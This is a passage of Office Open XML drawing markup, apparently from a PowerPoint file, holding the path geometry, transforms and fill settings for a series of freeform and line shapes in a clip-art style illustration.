                    <a:gd name="T16" fmla="*/ 154 w 211"/>
                    <a:gd name="T17" fmla="*/ 220 h 232"/>
                    <a:gd name="T18" fmla="*/ 154 w 211"/>
                    <a:gd name="T19" fmla="*/ 220 h 232"/>
                    <a:gd name="T20" fmla="*/ 176 w 211"/>
                    <a:gd name="T21" fmla="*/ 209 h 232"/>
                    <a:gd name="T22" fmla="*/ 168 w 211"/>
                    <a:gd name="T23" fmla="*/ 67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11" h="232">
                      <a:moveTo>
                        <a:pt x="168" y="67"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="134" y="21"/>
                        <a:pt x="82" y="0"/>
                        <a:pt x="46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9" y="38"/>
                        <a:pt x="19" y="38"/>
                        <a:pt x="19" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="70"/>
                        <a:pt x="8" y="121"/>
                        <a:pt x="41" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="58" y="187"/>
                        <a:pt x="79" y="203"/>
                        <a:pt x="100" y="212"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="109" y="232"/>
                        <a:pt x="109" y="232"/>
                        <a:pt x="109" y="232"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="154" y="220"/>
                        <a:pt x="154" y="220"/>
                        <a:pt x="154" y="220"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="154" y="220"/>
                        <a:pt x="154" y="220"/>
                        <a:pt x="154" y="220"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="162" y="218"/>
                        <a:pt x="169" y="214"/>
                        <a:pt x="176" y="209"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="211" y="183"/>
                        <a:pt x="208" y="119"/>
                        <a:pt x="168" y="67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08" name="Freeform 241">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE4A4A4E-51F1-4014-88F1-CA586C762DA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502" y="5374"/>
                  <a:ext cx="503" cy="569"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 178 w 213"/>
                    <a:gd name="T1" fmla="*/ 214 h 241"/>
                    <a:gd name="T2" fmla="*/ 43 w 213"/>
                    <a:gd name="T3" fmla="*/ 169 h 241"/>
                    <a:gd name="T4" fmla="*/ 35 w 213"/>
                    <a:gd name="T5" fmla="*/ 27 h 241"/>
                    <a:gd name="T6" fmla="*/ 170 w 213"/>
                    <a:gd name="T7" fmla="*/ 72 h 241"/>
                    <a:gd name="T8" fmla="*/ 178 w 213"/>
                    <a:gd name="T9" fmla="*/ 214 h 2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3" h="241">
                      <a:moveTo>
                        <a:pt x="178" y="214"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="142" y="241"/>
                        <a:pt x="82" y="221"/>
                        <a:pt x="43" y="169"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="117"/>
                        <a:pt x="0" y="54"/>
                        <a:pt x="35" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="70" y="0"/>
                        <a:pt x="131" y="20"/>
                        <a:pt x="170" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="210" y="124"/>
                        <a:pt x="213" y="188"/>
                        <a:pt x="178" y="2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09" name="Freeform 242">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77335683-3D5B-4617-9968-975D2B0D003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602" y="5485"/>
                  <a:ext cx="304" cy="347"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 108 w 129"/>
                    <a:gd name="T1" fmla="*/ 131 h 147"/>
                    <a:gd name="T2" fmla="*/ 26 w 129"/>
                    <a:gd name="T3" fmla="*/ 103 h 147"/>
                    <a:gd name="T4" fmla="*/ 21 w 129"/>
                    <a:gd name="T5" fmla="*/ 17 h 147"/>
                    <a:gd name="T6" fmla="*/ 103 w 129"/>
                    <a:gd name="T7" fmla="*/ 44 h 147"/>
                    <a:gd name="T8" fmla="*/ 108 w 129"/>
                    <a:gd name="T9" fmla="*/ 131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" h="147">
                      <a:moveTo>
                        <a:pt x="108" y="131"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="86" y="147"/>
                        <a:pt x="50" y="135"/>
                        <a:pt x="26" y="103"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="72"/>
                        <a:pt x="0" y="33"/>
                        <a:pt x="21" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="0"/>
                        <a:pt x="79" y="13"/>
                        <a:pt x="103" y="44"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="127" y="76"/>
                        <a:pt x="129" y="114"/>
                        <a:pt x="108" y="131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10" name="Freeform 243">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61B34E3D-4D28-4D2A-969E-8B65E1D155B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-1189" y="4859"/>
                  <a:ext cx="498" cy="548"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 168 w 211"/>
                    <a:gd name="T1" fmla="*/ 67 h 232"/>
                    <a:gd name="T2" fmla="*/ 46 w 211"/>
                    <a:gd name="T3" fmla="*/ 15 h 232"/>
                    <a:gd name="T4" fmla="*/ 46 w 211"/>
                    <a:gd name="T5" fmla="*/ 14 h 232"/>
                    <a:gd name="T6" fmla="*/ 12 w 211"/>
                    <a:gd name="T7" fmla="*/ 23 h 232"/>
                    <a:gd name="T8" fmla="*/ 19 w 211"/>
                    <a:gd name="T9" fmla="*/ 38 h 232"/>
                    <a:gd name="T10" fmla="*/ 41 w 211"/>
                    <a:gd name="T11" fmla="*/ 164 h 232"/>
                    <a:gd name="T12" fmla="*/ 100 w 211"/>
                    <a:gd name="T13" fmla="*/ 212 h 232"/>
                    <a:gd name="T14" fmla="*/ 109 w 211"/>
                    <a:gd name="T15" fmla="*/ 232 h 232"/>
                    <a:gd name="T16" fmla="*/ 154 w 211"/>
                    <a:gd name="T17" fmla="*/ 219 h 232"/>
                    <a:gd name="T18" fmla="*/ 154 w 211"/>
                    <a:gd name="T19" fmla="*/ 219 h 232"/>
                    <a:gd name="T20" fmla="*/ 176 w 211"/>
                    <a:gd name="T21" fmla="*/ 209 h 232"/>
                    <a:gd name="T22" fmla="*/ 168 w 211"/>
                    <a:gd name="T23" fmla="*/ 67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11" h="232">
                      <a:moveTo>
                        <a:pt x="168" y="67"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="133" y="21"/>
                        <a:pt x="82" y="0"/>
                        <a:pt x="46" y="15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9" y="38"/>
                        <a:pt x="19" y="38"/>
                        <a:pt x="19" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="70"/>
                        <a:pt x="8" y="121"/>
                        <a:pt x="41" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="58" y="186"/>
                        <a:pt x="78" y="203"/>
                        <a:pt x="100" y="212"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="109" y="232"/>
                        <a:pt x="109" y="232"/>
                        <a:pt x="109" y="232"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="154" y="219"/>
                        <a:pt x="154" y="219"/>
                        <a:pt x="154" y="219"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="154" y="219"/>
                        <a:pt x="154" y="219"/>
                        <a:pt x="154" y="219"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="162" y="218"/>
                        <a:pt x="169" y="214"/>
                        <a:pt x="176" y="209"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="211" y="183"/>
                        <a:pt x="207" y="119"/>
                        <a:pt x="168" y="67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11" name="Freeform 244">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F36DE91-CD5C-40D9-B97D-CDECE9FC03D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-1298" y="4875"/>
                  <a:ext cx="503" cy="570"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 177 w 213"/>
                    <a:gd name="T1" fmla="*/ 214 h 241"/>
                    <a:gd name="T2" fmla="*/ 42 w 213"/>
                    <a:gd name="T3" fmla="*/ 169 h 241"/>
                    <a:gd name="T4" fmla="*/ 35 w 213"/>
                    <a:gd name="T5" fmla="*/ 27 h 241"/>
                    <a:gd name="T6" fmla="*/ 170 w 213"/>
                    <a:gd name="T7" fmla="*/ 72 h 241"/>
                    <a:gd name="T8" fmla="*/ 177 w 213"/>
                    <a:gd name="T9" fmla="*/ 214 h 2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3" h="241">
                      <a:moveTo>
                        <a:pt x="177" y="214"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="142" y="241"/>
                        <a:pt x="82" y="221"/>
                        <a:pt x="42" y="169"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="117"/>
                        <a:pt x="0" y="53"/>
                        <a:pt x="35" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="70" y="0"/>
                        <a:pt x="131" y="20"/>
                        <a:pt x="170" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="209" y="124"/>
                        <a:pt x="213" y="187"/>
                        <a:pt x="177" y="2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12" name="Freeform 245">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CC23A24-7E27-4591-AC87-C052C498450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-1201" y="4987"/>
                  <a:ext cx="307" cy="347"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 108 w 130"/>
                    <a:gd name="T1" fmla="*/ 130 h 147"/>
                    <a:gd name="T2" fmla="*/ 26 w 130"/>
                    <a:gd name="T3" fmla="*/ 103 h 147"/>
                    <a:gd name="T4" fmla="*/ 22 w 130"/>
                    <a:gd name="T5" fmla="*/ 16 h 147"/>
                    <a:gd name="T6" fmla="*/ 104 w 130"/>
                    <a:gd name="T7" fmla="*/ 44 h 147"/>
                    <a:gd name="T8" fmla="*/ 108 w 130"/>
                    <a:gd name="T9" fmla="*/ 130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" h="147">
                      <a:moveTo>
                        <a:pt x="108" y="130"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="87" y="147"/>
                        <a:pt x="50" y="134"/>
                        <a:pt x="26" y="103"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="71"/>
                        <a:pt x="0" y="33"/>
                        <a:pt x="22" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="0"/>
                        <a:pt x="80" y="12"/>
                        <a:pt x="104" y="44"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="128" y="75"/>
                        <a:pt x="130" y="114"/>
                        <a:pt x="108" y="13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13" name="Freeform 246">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CA40A85-9460-4C83-9F29-901E5467010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-1496" y="3465"/>
                  <a:ext cx="2740" cy="2393"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1144 w 1160"/>
                    <a:gd name="T1" fmla="*/ 727 h 1013"/>
                    <a:gd name="T2" fmla="*/ 1054 w 1160"/>
                    <a:gd name="T3" fmla="*/ 679 h 1013"/>
                    <a:gd name="T4" fmla="*/ 954 w 1160"/>
                    <a:gd name="T5" fmla="*/ 346 h 1013"/>
                    <a:gd name="T6" fmla="*/ 876 w 1160"/>
                    <a:gd name="T7" fmla="*/ 233 h 1013"/>
                    <a:gd name="T8" fmla="*/ 0 w 1160"/>
                    <a:gd name="T9" fmla="*/ 0 h 1013"/>
                    <a:gd name="T10" fmla="*/ 0 w 1160"/>
                    <a:gd name="T11" fmla="*/ 713 h 1013"/>
                    <a:gd name="T12" fmla="*/ 99 w 1160"/>
                    <a:gd name="T13" fmla="*/ 739 h 1013"/>
                    <a:gd name="T14" fmla="*/ 110 w 1160"/>
                    <a:gd name="T15" fmla="*/ 613 h 1013"/>
                    <a:gd name="T16" fmla="*/ 261 w 1160"/>
                    <a:gd name="T17" fmla="*/ 663 h 1013"/>
                    <a:gd name="T18" fmla="*/ 292 w 1160"/>
                    <a:gd name="T19" fmla="*/ 791 h 1013"/>
                    <a:gd name="T20" fmla="*/ 858 w 1160"/>
                    <a:gd name="T21" fmla="*/ 943 h 1013"/>
                    <a:gd name="T22" fmla="*/ 873 w 1160"/>
                    <a:gd name="T23" fmla="*/ 824 h 1013"/>
                    <a:gd name="T24" fmla="*/ 1024 w 1160"/>
                    <a:gd name="T25" fmla="*/ 874 h 1013"/>
                    <a:gd name="T26" fmla="*/ 1056 w 1160"/>
                    <a:gd name="T27" fmla="*/ 996 h 1013"/>
                    <a:gd name="T28" fmla="*/ 1089 w 1160"/>
                    <a:gd name="T29" fmla="*/ 1005 h 1013"/>
                    <a:gd name="T30" fmla="*/ 1144 w 1160"/>
                    <a:gd name="T31" fmla="*/ 1013 h 1013"/>
                    <a:gd name="T32" fmla="*/ 1144 w 1160"/>
                    <a:gd name="T33" fmla="*/ 727 h 10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160" h="1013">
                      <a:moveTo>
                        <a:pt x="1144" y="727"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1127" y="704"/>
                        <a:pt x="1054" y="679"/>
                        <a:pt x="1054" y="679"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="954" y="346"/>
                        <a:pt x="954" y="346"/>
                        <a:pt x="954" y="346"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="954" y="346"/>
                        <a:pt x="934" y="250"/>
                        <a:pt x="876" y="23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713"/>
                        <a:pt x="0" y="713"/>
                        <a:pt x="0" y="713"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="99" y="739"/>
                        <a:pt x="99" y="739"/>
                        <a:pt x="99" y="739"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="689"/>
                        <a:pt x="78" y="637"/>
                        <a:pt x="110" y="613"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="583"/>
                        <a:pt x="217" y="605"/>
                        <a:pt x="261" y="663"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="294" y="706"/>
                        <a:pt x="304" y="756"/>
                        <a:pt x="292" y="791"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="858" y="943"/>
                        <a:pt x="858" y="943"/>
                        <a:pt x="858" y="943"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="837" y="895"/>
                        <a:pt x="842" y="847"/>
                        <a:pt x="873" y="824"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="912" y="794"/>
                        <a:pt x="980" y="816"/>
                        <a:pt x="1024" y="874"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1054" y="915"/>
                        <a:pt x="1066" y="961"/>
                        <a:pt x="1056" y="996"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1089" y="1005"/>
                        <a:pt x="1089" y="1005"/>
                        <a:pt x="1089" y="1005"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1144" y="1013"/>
                        <a:pt x="1144" y="1013"/>
                        <a:pt x="1144" y="1013"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1144" y="1013"/>
                        <a:pt x="1160" y="750"/>
                        <a:pt x="1144" y="72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14" name="Freeform 247">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81465CA1-69BA-45A6-9C3D-3775BF432D5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-1496" y="3101"/>
                  <a:ext cx="3413" cy="915"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1344 w 3413"/>
                    <a:gd name="T1" fmla="*/ 0 h 915"/>
                    <a:gd name="T2" fmla="*/ 0 w 3413"/>
                    <a:gd name="T3" fmla="*/ 364 h 915"/>
                    <a:gd name="T4" fmla="*/ 1344 w 3413"/>
                    <a:gd name="T5" fmla="*/ 721 h 915"/>
                    <a:gd name="T6" fmla="*/ 1564 w 3413"/>
                    <a:gd name="T7" fmla="*/ 780 h 915"/>
                    <a:gd name="T8" fmla="*/ 2069 w 3413"/>
                    <a:gd name="T9" fmla="*/ 915 h 915"/>
                    <a:gd name="T10" fmla="*/ 3413 w 3413"/>
                    <a:gd name="T11" fmla="*/ 551 h 915"/>
                    <a:gd name="T12" fmla="*/ 1344 w 3413"/>
                    <a:gd name="T13" fmla="*/ 0 h 9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413" h="915">
                      <a:moveTo>
                        <a:pt x="1344" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="364"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1344" y="721"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1564" y="780"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2069" y="915"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3413" y="551"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="134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15" name="Freeform 248">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2F3A063-A814-4E80-9852-61C56470E5A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573" y="3652"/>
                  <a:ext cx="1767" cy="1417"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 747 w 748"/>
                    <a:gd name="T1" fmla="*/ 446 h 600"/>
                    <a:gd name="T2" fmla="*/ 647 w 748"/>
                    <a:gd name="T3" fmla="*/ 113 h 600"/>
                    <a:gd name="T4" fmla="*/ 569 w 748"/>
                    <a:gd name="T5" fmla="*/ 0 h 600"/>
                    <a:gd name="T6" fmla="*/ 0 w 748"/>
                    <a:gd name="T7" fmla="*/ 154 h 600"/>
                    <a:gd name="T8" fmla="*/ 78 w 748"/>
                    <a:gd name="T9" fmla="*/ 267 h 600"/>
                    <a:gd name="T10" fmla="*/ 178 w 748"/>
                    <a:gd name="T11" fmla="*/ 600 h 600"/>
                    <a:gd name="T12" fmla="*/ 748 w 748"/>
                    <a:gd name="T13" fmla="*/ 447 h 600"/>
                    <a:gd name="T14" fmla="*/ 747 w 748"/>
                    <a:gd name="T15" fmla="*/ 446 h 6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48" h="600">
                      <a:moveTo>
                        <a:pt x="747" y="446"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="647" y="113"/>
                        <a:pt x="647" y="113"/>
                        <a:pt x="647" y="113"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="647" y="113"/>
                        <a:pt x="626" y="18"/>
                        <a:pt x="569" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="154"/>
                        <a:pt x="0" y="154"/>
                        <a:pt x="0" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="58" y="171"/>
                        <a:pt x="78" y="267"/>
                        <a:pt x="78" y="267"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="178" y="600"/>
                        <a:pt x="178" y="600"/>
                        <a:pt x="178" y="600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="748" y="447"/>
                        <a:pt x="748" y="447"/>
                        <a:pt x="748" y="447"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="747" y="447"/>
                        <a:pt x="747" y="446"/>
                        <a:pt x="747" y="44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16" name="Line 249">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D2A5DF2-517C-4905-9A9A-D9414F0862E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gray">
                <a:xfrm flipH="1" flipV="1">
                  <a:off x="-1227" y="3392"/>
                  <a:ext cx="2067" cy="55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17" name="Line 250">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCFC3720-0C37-47CA-B83B-FF03B13BAA3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gray">
                <a:xfrm flipH="1" flipV="1">
                  <a:off x="-960" y="3321"/>
                  <a:ext cx="2067" cy="55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18" name="Line 251">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25DA9EDC-AA4A-4C74-A34F-5C12001FABC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gray">
                <a:xfrm flipH="1" flipV="1">
                  <a:off x="-693" y="3248"/>
                  <a:ext cx="2067" cy="55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Line 252">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AB0B9FF-9AE3-44AC-BB2A-CBCE98F7A75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gray">
                <a:xfrm flipH="1" flipV="1">
                  <a:off x="-426" y="3177"/>
                  <a:ext cx="2067" cy="55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20" name="Freeform 253">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C8326DF-0A31-4B8D-9FCF-95C8BCF793E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-1399" y="3708"/>
                  <a:ext cx="1443" cy="1106"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1443"/>
                    <a:gd name="T1" fmla="*/ 0 h 1106"/>
                    <a:gd name="T2" fmla="*/ 0 w 1443"/>
                    <a:gd name="T3" fmla="*/ 721 h 1106"/>
                    <a:gd name="T4" fmla="*/ 1443 w 1443"/>
                    <a:gd name="T5" fmla="*/ 1106 h 1106"/>
                    <a:gd name="T6" fmla="*/ 1443 w 1443"/>
                    <a:gd name="T7" fmla="*/ 385 h 1106"/>
                    <a:gd name="T8" fmla="*/ 0 w 1443"/>
                    <a:gd name="T9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43" h="1106">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="721"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1443" y="1106"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1443" y="38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21" name="Freeform 254">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{789912DD-1BF7-4E3E-BACF-ECABEAA5B38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41" y="4119"/>
                  <a:ext cx="581" cy="1534"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 581 w 581"/>
                    <a:gd name="T1" fmla="*/ 154 h 1534"/>
                    <a:gd name="T2" fmla="*/ 0 w 581"/>
                    <a:gd name="T3" fmla="*/ 0 h 1534"/>
                    <a:gd name="T4" fmla="*/ 0 w 581"/>
                    <a:gd name="T5" fmla="*/ 1470 h 1534"/>
                    <a:gd name="T6" fmla="*/ 236 w 581"/>
                    <a:gd name="T7" fmla="*/ 1534 h 1534"/>
                    <a:gd name="T8" fmla="*/ 572 w 581"/>
                    <a:gd name="T9" fmla="*/ 1035 h 1534"/>
                    <a:gd name="T10" fmla="*/ 581 w 581"/>
                    <a:gd name="T11" fmla="*/ 154 h 1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81" h="1534">
                      <a:moveTo>
                        <a:pt x="581" y="154"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1470"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="236" y="1534"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="572" y="1035"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="581" y="15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22" name="Freeform 255">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09B20B50-AE39-41E1-A07A-88CA6D74EC0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753" y="4370"/>
                  <a:ext cx="210" cy="692"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 210 w 210"/>
                    <a:gd name="T1" fmla="*/ 692 h 692"/>
                    <a:gd name="T2" fmla="*/ 0 w 210"/>
                    <a:gd name="T3" fmla="*/ 635 h 692"/>
                    <a:gd name="T4" fmla="*/ 4 w 210"/>
                    <a:gd name="T5" fmla="*/ 0 h 692"/>
                    <a:gd name="T6" fmla="*/ 210 w 210"/>
                    <a:gd name="T7" fmla="*/ 692 h 6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0" h="692">
                      <a:moveTo>
                        <a:pt x="210" y="692"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="635"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="69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3399FF">
                        <a:gamma/>
                        <a:tint val="28235"/>
                        <a:invGamma/>
                      </a:srgbClr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Freeform 256">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C043680-42B1-4420-90A0-A308E829303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231" y="4238"/>
                  <a:ext cx="451" cy="749"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 451"/>
                    <a:gd name="T1" fmla="*/ 0 h 749"/>
                    <a:gd name="T2" fmla="*/ 0 w 451"/>
                    <a:gd name="T3" fmla="*/ 626 h 749"/>
                    <a:gd name="T4" fmla="*/ 451 w 451"/>
                    <a:gd name="T5" fmla="*/ 749 h 749"/>
                    <a:gd name="T6" fmla="*/ 451 w 451"/>
                    <a:gd name="T7" fmla="*/ 120 h 749"/>
                    <a:gd name="T8" fmla="*/ 0 w 451"/>
                    <a:gd name="T9" fmla="*/ 0 h 7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1" h="749">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="626"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="451" y="749"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="451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3399FF">
                        <a:gamma/>
                        <a:tint val="28235"/>
                        <a:invGamma/>
                      </a:srgbClr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24" name="Freeform 257">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA1F9325-17BE-4B52-AAD2-49CCB46F4C7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781" y="3930"/>
                  <a:ext cx="1533" cy="1134"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 234 w 1533"/>
                    <a:gd name="T1" fmla="*/ 1134 h 1134"/>
                    <a:gd name="T2" fmla="*/ 0 w 1533"/>
                    <a:gd name="T3" fmla="*/ 348 h 1134"/>
                    <a:gd name="T4" fmla="*/ 1302 w 1533"/>
                    <a:gd name="T5" fmla="*/ 0 h 1134"/>
                    <a:gd name="T6" fmla="*/ 1533 w 1533"/>
                    <a:gd name="T7" fmla="*/ 785 h 1134"/>
                    <a:gd name="T8" fmla="*/ 234 w 1533"/>
                    <a:gd name="T9" fmla="*/ 1134 h 1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3" h="1134">
                      <a:moveTo>
                        <a:pt x="234" y="1134"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="348"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1302" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1533" y="785"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="234" y="113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3399FF">
                        <a:gamma/>
                        <a:tint val="28235"/>
                        <a:invGamma/>
                      </a:srgbClr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25" name="Freeform 258">
